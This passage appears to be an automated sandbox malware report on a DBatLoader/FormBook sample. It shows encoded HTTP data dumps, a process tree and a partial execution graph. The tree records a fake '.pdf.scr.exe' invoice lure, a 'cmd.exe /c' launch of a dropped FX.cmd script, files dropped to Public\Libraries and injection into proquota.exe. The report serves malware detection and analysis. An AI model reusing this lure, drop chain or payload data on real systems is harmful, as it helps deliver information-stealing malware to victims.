                                                                                                  Data Ascii: 7PsZh6jwxTqT/gOYOtwUCLvHcSB1kQiCyhCNDPMVpqH1331/tATStF5UixU/LFPlF5WSAp+qz+FlAKedJ99IYdpn9bpYJvaE8+SByYW3WS3eyxP2YQJcu/6D7TIjyNzCOXOWWVMHCIWYkMzFRIsxKF3rA7b+zDipHpv2AYax0Ab0Ik9PQT/ewq3vsgLK0eBU84fkegXXfqhfiHI0Ksvb4u8rBCvxyP5M4WJ844T08QJ3SxZsU0s+syQncLSKcdN
                                                                                                  2024-12-30 09:57:07 UTC1390INData Raw: 68 45 74 32 41 37 4c 47 44 41 32 74 73 53 41 48 43 2b 32 2b 51 74 30 4a 41 55 59 48 6e 71 30 34 6b 50 69 6f 44 44 76 39 50 70 59 71 66 31 72 55 75 57 70 4e 4e 35 38 68 51 30 55 69 4a 32 66 53 74 7a 49 6d 34 62 47 42 52 76 38 52 6e 7a 31 35 65 72 44 7a 6e 42 48 4d 66 33 6e 49 6c 6c 49 59 34 4e 66 79 34 69 4c 38 59 4e 31 51 30 4d 43 48 36 68 48 6e 4b 34 33 62 47 6f 61 78 72 73 72 45 59 31 6e 64 36 38 45 58 51 47 63 4b 43 2b 4b 6f 52 72 7a 38 62 63 64 34 65 36 62 6b 6d 38 51 56 74 38 49 67 76 6c 4c 4d 71 76 36 47 53 55 35 68 44 54 59 4a 58 79 72 2b 6f 51 53 58 56 67 30 6a 6a 42 35 36 79 67 69 77 62 59 71 51 33 6e 4d 69 63 4e 57 47 31 42 71 77 32 4e 38 59 63 66 49 6e 74 43 52 56 50 48 6a 36 48 76 72 48 61 66 71 75 79 75 64 71 39 51 6a 6c 6c 5a 37 37 65 62 43
                                                                                                  Data Ascii: hEt2A7LGDA2tsSAHC+2+Qt0JAUYHnq04kPioDDv9PpYqf1rUuWpNN58hQ0UiJ2fStzIm4bGBRv8Rnz15erDznBHMf3nIllIY4Nfy4iL8YN1Q0MCH6hHnK43bGoaxrsrEY1nd68EXQGcKC+KoRrz8bcd4e6bkm8QVt8IgvlLMqv6GSU5hDTYJXyr+oQSXVg0jjB56ygiwbYqQ3nMicNWG1Bqw2N8YcfIntCRVPHj6HvrHafquyudq9QjllZ77ebC
                                                                                                  2024-12-30 09:57:07 UTC1390INData Raw: 4a 6a 30 4f 72 72 68 61 73 61 4e 77 57 4f 53 78 4b 71 31 4c 72 36 58 2f 54 67 72 6f 32 42 6b 79 34 41 70 38 4c 4a 39 66 53 6d 43 4f 39 7a 6c 65 31 59 37 4b 46 31 76 30 64 77 57 35 5a 36 50 51 31 79 42 38 6b 74 79 79 76 36 50 45 33 73 7a 4c 76 39 4a 48 37 72 46 70 74 6f 43 50 45 6a 6d 38 74 38 6a 46 58 77 31 39 51 34 44 72 52 31 50 4a 2b 39 67 2b 6b 64 50 73 65 61 5a 47 56 73 4f 64 75 72 34 79 4b 4f 68 4a 4d 58 48 62 50 6c 34 65 71 76 44 53 70 2b 49 75 6e 78 4d 59 68 51 45 67 66 73 7a 6f 49 48 67 54 6f 6f 67 50 73 65 5a 79 6b 75 30 50 58 6a 50 6a 46 7a 6f 42 79 79 39 38 58 4b 33 34 66 67 67 74 53 78 32 39 53 74 37 79 78 72 45 6e 42 66 72 37 71 50 59 67 41 56 36 30 67 4f 4b 47 48 61 6e 64 6d 65 53 2f 48 79 4a 36 6d 44 53 74 7a 66 62 59 2f 33 77 46 4b 6f 4c
                                                                                                  Data Ascii: Jj0OrrhasaNwWOSxKq1Lr6X/Tgro2Bky4Ap8LJ9fSmCO9zle1Y7KF1v0dwW5Z6PQ1yB8ktyyv6PE3szLv9JH7rFptoCPEjm8t8jFXw19Q4DrR1PJ+9g+kdPseaZGVsOdur4yKOhJMXHbPl4eqvDSp+IunxMYhQEgfszoIHgToogPseZyku0PXjPjFzoByy98XK34fggtSx29St7yxrEnBfr7qPYgAV60gOKGHandmeS/HyJ6mDStzfbY/3wFKoL
                                                                                                  2024-12-30 09:57:07 UTC1390INData Raw: 6a 6b 37 68 67 45 31 66 43 50 6d 4a 74 56 79 50 72 33 70 63 48 49 4a 42 4c 52 34 46 6d 38 6f 44 58 33 6d 45 55 57 4d 69 69 31 78 66 6b 78 72 68 79 59 62 62 39 6d 35 39 38 47 34 65 53 44 46 4e 4f 77 55 48 65 62 41 4b 46 6b 74 7a 4b 42 65 52 2f 77 76 54 5a 4e 57 6a 7a 70 51 6b 52 30 66 77 4f 6d 72 75 6f 43 6f 78 79 49 78 59 2b 54 31 6c 4b 79 79 4e 47 33 69 31 48 2b 71 73 77 35 38 73 66 4b 5a 55 4e 31 69 49 35 50 56 36 54 47 32 6c 69 39 4f 7a 61 44 54 43 61 72 4e 34 61 48 30 45 75 76 63 66 30 73 44 38 6c 64 34 68 65 73 77 4d 55 78 71 43 6d 2b 37 37 44 57 4f 6a 4d 51 72 70 50 68 59 2f 56 47 62 53 4e 72 4a 38 7a 74 71 6f 57 78 6a 32 65 2f 2b 2f 36 6e 43 2b 45 6b 50 38 6e 31 69 7a 32 72 31 39 37 44 53 6e 55 33 46 4d 77 56 56 52 6e 2b 50 4a 77 37 47 34 75 78 6c
                                                                                                  Data Ascii: jk7hgE1fCPmJtVyPr3pcHIJBLR4Fm8oDX3mEUWMii1xfkxrhyYbb9m598G4eSDFNOwUHebAKFktzKBeR/wvTZNWjzpQkR0fwOmruoCoxyIxY+T1lKyyNG3i1H+qsw58sfKZUN1iI5PV6TG2li9OzaDTCarN4aH0Euvcf0sD8ld4heswMUxqCm+77DWOjMQrpPhY/VGbSNrJ8ztqoWxj2e/+/6nC+EkP8n1iz2r197DSnU3FMwVVRn+PJw7G4uxl


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:04:57:01
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1'364'480 bytes
                                                                                                  MD5 hash:09F4F91713BD6588465534822D5AD96C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2231702231.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2191756371.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:04:57:07
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                  Imagebase:0x1c0000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:04:57:07
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:04:57:08
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Imagebase:0x400000
                                                                                                  File size:175'800 bytes
                                                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2699018066.0000000024B40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2702788304.0000000024FD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:04:57:21
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Users\Public\Libraries\Tizelcdh.PIF
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\Public\Libraries\Tizelcdh.PIF"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1'364'480 bytes
                                                                                                  MD5 hash:09F4F91713BD6588465534822D5AD96C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.2342771726.0000000002226000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 26%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:04:57:22
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                  Imagebase:0x1c0000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:10
                                                                                                  Start time:04:57:23
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:11
                                                                                                  Start time:04:57:23
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Imagebase:0x400000
                                                                                                  File size:175'800 bytes
                                                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2788912013.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2807095527.000000001D920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:12
                                                                                                  Start time:04:57:30
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Users\Public\Libraries\Tizelcdh.PIF
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\Public\Libraries\Tizelcdh.PIF"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:1'364'480 bytes
                                                                                                  MD5 hash:09F4F91713BD6588465534822D5AD96C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Borland Delphi
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:13
                                                                                                  Start time:04:57:31
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                  Imagebase:0x1c0000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:14
                                                                                                  Start time:04:57:31
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:15
                                                                                                  Start time:04:57:31
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\Public\Libraries\hdcleziT.pif
                                                                                                  Imagebase:0x400000
                                                                                                  File size:175'800 bytes
                                                                                                  MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2725067092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:17
                                                                                                  Start time:04:57:45
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe"
                                                                                                  Imagebase:0x810000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3370452478.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:18
                                                                                                  Start time:04:57:47
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\proquota.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\proquota.exe"
                                                                                                  Imagebase:0xb50000
                                                                                                  File size:39'424 bytes
                                                                                                  MD5 hash:224AA81092A51AE0080DEE1E454E11AD
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3368003513.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:19
                                                                                                  Start time:04:58:00
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe"
                                                                                                  Imagebase:0x810000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.3371188324.0000000005980000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:20
                                                                                                  Start time:04:58:03
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\proquota.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\proquota.exe"
                                                                                                  Imagebase:0xb50000
                                                                                                  File size:39'424 bytes
                                                                                                  MD5 hash:224AA81092A51AE0080DEE1E454E11AD
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.2805235368.0000000000650000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:21
                                                                                                  Start time:04:58:06
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe"
                                                                                                  Imagebase:0x810000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:23
                                                                                                  Start time:04:58:29
                                                                                                  Start date:30/12/2024
                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                  Imagebase:0x7ff7f1e10000
                                                                                                  File size:676'768 bytes
                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:15.4%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:10.3%
                                                                                                    Total number of Nodes:290
                                                                                                    Total number of Limit Nodes:15
                                                                                                    execution_graph 25064 2b467bc 25881 2b2480c 25064->25881 25882 2b2481d 25881->25882 25883 2b24843 25882->25883 25884 2b2485a 25882->25884 25890 2b24b78 25883->25890 25899 2b24570 25884->25899 25887 2b2488b 25888 2b24850 25888->25887 25904 2b24500 25888->25904 25891 2b24b85 25890->25891 25898 2b24bb5 25890->25898 25892 2b24bae 25891->25892 25894 2b24b91 25891->25894 25895 2b24570 11 API calls 25892->25895 25910 2b22c44 11 API calls 25894->25910 25895->25898 25896 2b24b9f 25896->25888 25911 2b244ac 25898->25911 25900 2b24574 25899->25900 25901 2b24598 25899->25901 25924 2b22c10 25900->25924 25901->25888 25903 2b24581 25903->25888 25905 2b24504 25904->25905 25908 2b24514 25904->25908 25907 2b24570 11 API calls 25905->25907 25905->25908 25906 2b24542 25906->25887 25907->25908 25908->25906 25909 2b22c2c 11 API calls 25908->25909 25909->25906 25910->25896 25912 2b244b2 25911->25912 25914 2b244cd 25911->25914 25912->25914 25915 2b22c2c 25912->25915 25914->25896 25916 2b22c3a 25915->25916 25917 2b22c30 25915->25917 25916->25914 25917->25916 25919 2b22d19 25917->25919 25922 2b264cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 25917->25922 25923 2b22ce8 7 API calls 25919->25923 25921 2b22d3a 25921->25914 25922->25919 25923->25921 25925 2b22c27 25924->25925 25928 2b22c14 25924->25928 25925->25903 25926 2b22c1e 25926->25903 25927 2b22d19 25933 2b22ce8 7 API calls 25927->25933 25928->25926 25928->25927 25932 2b264cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 25928->25932 25931 2b22d3a 25931->25903 25932->25927 25933->25931 25934 2b4c2fc 25944 2b26518 25934->25944 25938 2b4c32a 25949 2b4bb48 timeSetEvent 25938->25949 25940 2b4c334 25941 2b4c342 GetMessageA 25940->25941 25942 2b4c336 TranslateMessage DispatchMessageA 25941->25942 25943 2b4c352 25941->25943 25942->25941 25945 2b26523 25944->25945 25950 2b24168 25945->25950 25948 2b2427c SysAllocStringLen SysFreeString SysReAllocStringLen 25948->25938 25949->25940 25951 2b241ae 25950->25951 25952 2b24227 25951->25952 25953 2b243b8 25951->25953 25964 2b24100 25952->25964 25956 2b243e9 25953->25956 25960 2b243fa 25953->25960 25969 2b2432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 25956->25969 25958 2b243f3 25958->25960 25959 2b2443f FreeLibrary 25959->25960 25960->25959 25961 2b24463 25960->25961 25962 2b24472 ExitProcess 25961->25962 25963 2b2446c 25961->25963 25963->25962 25965 2b24110 25964->25965 25966 2b24143 25964->25966 25965->25966 25970 2b215cc 25965->25970 25974 2b25814 25965->25974 25966->25948 25969->25958 25978 2b21560 25970->25978 25972 2b215d4 VirtualAlloc 25973 2b215eb 25972->25973 25973->25965 25975 2b25824 GetModuleFileNameA 25974->25975 25977 2b25840 25974->25977 25980 2b25a78 GetModuleFileNameA RegOpenKeyExA 25975->25980 25977->25965 25979 2b21500 25978->25979 25979->25972 25981 2b25afb 25980->25981 25982 2b25abb RegOpenKeyExA 25980->25982 25998 2b258b4 12 API calls 25981->25998 25982->25981 25983 2b25ad9 RegOpenKeyExA 25982->25983 25983->25981 25986 2b25b84 lstrcpynA GetThreadLocale GetLocaleInfoA 25983->25986 25985 2b25b20 RegQueryValueExA 25987 2b25b5e RegCloseKey 25985->25987 25988 2b25b40 RegQueryValueExA 25985->25988 25989 2b25bbb 25986->25989 25990 2b25c9e 25986->25990 25987->25977 25988->25987 25989->25990 25992 2b25bcb lstrlenA 25989->25992 25990->25977 25993 2b25be3 25992->25993 25993->25990 25994 2b25c30 25993->25994 25995 2b25c08 lstrcpynA LoadLibraryExA 25993->25995 25994->25990 25996 2b25c3a lstrcpynA LoadLibraryExA 25994->25996 25995->25994 25996->25990 25997 2b25c6c lstrcpynA LoadLibraryExA 25996->25997 25997->25990 25998->25985 25999 2b4bb3c 26002 2b3ec6c 25999->26002 26003 2b3ec74 26002->26003 26003->26003 28983 2b38704 LoadLibraryW 26003->28983 26005 2b3ec96 28988 2b22ee0 QueryPerformanceCounter 26005->28988 26007 2b3ec9b 26008 2b3eca5 InetIsOffline 26007->26008 26009 2b3ecc0 26008->26009 26010 2b3ecaf 26008->26010 26012 2b24500 11 API calls 26009->26012 26011 2b24500 11 API calls 26010->26011 26013 2b3ecbe 26011->26013 26012->26013 26014 2b2480c 11 API calls 26013->26014 26015 2b3eced 26014->26015 26016 2b3ecf5 26015->26016 28991 2b24798 26016->28991 26018 2b3ed18 26019 2b3ed20 26018->26019 26020 2b3ed2a 26019->26020 29006 2b3881c 26020->29006 26023 2b2480c 11 API calls 26024 2b3ed51 26023->26024 26025 2b3ed59 26024->26025 26026 2b24798 11 API calls 26025->26026 26027 2b3ed7c 26026->26027 26028 2b3ed84 26027->26028 29019 2b246a4 26028->29019 29021 2b380c0 28983->29021 28985 2b3873d 29032 2b37cf8 28985->29032 28989 2b22ef8 GetTickCount 28988->28989 28990 2b22eed 28988->28990 28989->26007 28990->26007 28992 2b2479c 28991->28992 28993 2b247fd 28991->28993 28994 2b24500 28992->28994 28995 2b247a4 28992->28995 28999 2b24570 11 API calls 28994->28999 29001 2b24514 28994->29001 28995->28993 28996 2b247b3 28995->28996 28998 2b24500 11 API calls 28995->28998 29000 2b24570 11 API calls 28996->29000 28997 2b24542 28997->26018 28998->28996 28999->29001 29002 2b247cd 29000->29002 29001->28997 29003 2b22c2c 11 API calls 29001->29003 29004 2b24500 11 API calls 29002->29004 29003->28997 29005 2b247f9 29004->29005 29005->26018 29007 2b38830 29006->29007 29008 2b3884f LoadLibraryA 29007->29008 29068 2b2494c 29008->29068 29011 2b2494c 29012 2b38872 GetProcAddress 29011->29012 29013 2b38899 29012->29013 29014 2b37cf8 18 API calls 29013->29014 29015 2b388dd FreeLibrary 29014->29015 29016 2b388f5 29015->29016 29017 2b244d0 11 API calls 29016->29017 29018 2b38902 29017->29018 29018->26023 29020 2b246aa 29019->29020 29022 2b24500 11 API calls 29021->29022 29023 2b380e5 29022->29023 29046 2b3790c 29023->29046 29026 2b24798 11 API calls 29027 2b380ff 29026->29027 29028 2b38107 GetModuleHandleW GetProcAddress GetProcAddress 29027->29028 29029 2b3813a 29028->29029 29052 2b244d0 29029->29052 29033 2b24500 11 API calls 29032->29033 29034 2b37d1d 29033->29034 29035 2b3790c 12 API calls 29034->29035 29036 2b37d2a 29035->29036 29037 2b24798 11 API calls 29036->29037 29038 2b37d3a 29037->29038 29057 2b38018 29038->29057 29041 2b380c0 15 API calls 29042 2b37d53 NtWriteVirtualMemory 29041->29042 29043 2b37d7f 29042->29043 29044 2b244d0 11 API calls 29043->29044 29045 2b37d8c FreeLibrary 29044->29045 29045->26005 29047 2b3791d 29046->29047 29048 2b24b78 11 API calls 29047->29048 29050 2b3792d 29048->29050 29049 2b37999 29049->29026 29050->29049 29056 2b2ba3c CharNextA 29050->29056 29054 2b244d6 29052->29054 29053 2b244fc 29053->28985 29054->29053 29055 2b22c2c 11 API calls 29054->29055 29055->29054 29056->29050 29058 2b24500 11 API calls 29057->29058 29059 2b3803b 29058->29059 29060 2b3790c 12 API calls 29059->29060 29061 2b38048 29060->29061 29062 2b38050 GetModuleHandleA 29061->29062 29063 2b380c0 15 API calls 29062->29063 29064 2b38061 GetModuleHandleA 29063->29064 29065 2b3807f 29064->29065 29066 2b244ac 11 API calls 29065->29066 29067 2b37d4d 29066->29067 29067->29041 29069 2b24950 GetModuleHandleA 29068->29069 29069->29011 29070 2b24e88 29071 2b24e95 29070->29071 29075 2b24e9c 29070->29075 29079 2b24bdc SysAllocStringLen 29071->29079 29076 2b24bfc 29075->29076 29077 2b24c02 SysFreeString 29076->29077 29078 2b24c08 29076->29078 29077->29078 29079->29075 29080 2b21c6c 29081 2b21d04 29080->29081 29082 2b21c7c 29080->29082 29083 2b21f58 29081->29083 29084 2b21d0d 29081->29084 29085 2b21cc0 29082->29085 29086 2b21c89 29082->29086 29087 2b21fec 29083->29087 29092 2b21f68 29083->29092 29093 2b21fac 29083->29093 29088 2b21d25 29084->29088 